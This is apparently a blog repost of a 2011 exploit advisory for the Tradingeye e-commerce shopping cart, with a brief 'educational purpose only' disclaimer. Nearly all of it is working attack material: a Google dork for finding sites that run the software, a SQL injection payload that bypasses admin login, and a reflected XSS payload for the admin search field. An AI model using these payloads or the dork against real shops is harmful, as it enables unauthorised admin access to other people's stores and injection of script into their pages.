Tradingeye E-commerce Shopping Cart Multiple Vulnerabilities


NOTE: This is for Educational purpose only to know about xss and auth bypass bugs in webapps….

# Exploit Title: Tradingeye Multiple Vulnerabilities
# Vendor:
# Date: 12th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
# Google Dork:  Powered by Tradingeye. © 2009 Tradingeye v6 demo
Tradingeye is a fully-featured web standards compliant Shopping Cart & CMS, built from the ground up with web accessibility and SEO in mind. Tradingeye is the
choice of thousands of online retailers who care about accessibility, usability and most importantly – results.


(Auth ByPass) SQLi Vulnerability
{DEMO} :

Username: ‘ or 0=0 #
Password: ‘ or 0=0 #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in the site.

Reflected XSS Vulnerability
EXPLOIT 2: Reflected XSS Vulnerability in admin panel(search field)

Exploit:  “>><marquee><h1>XSSed_by_r007k17</h1></marquee>

gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14–


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: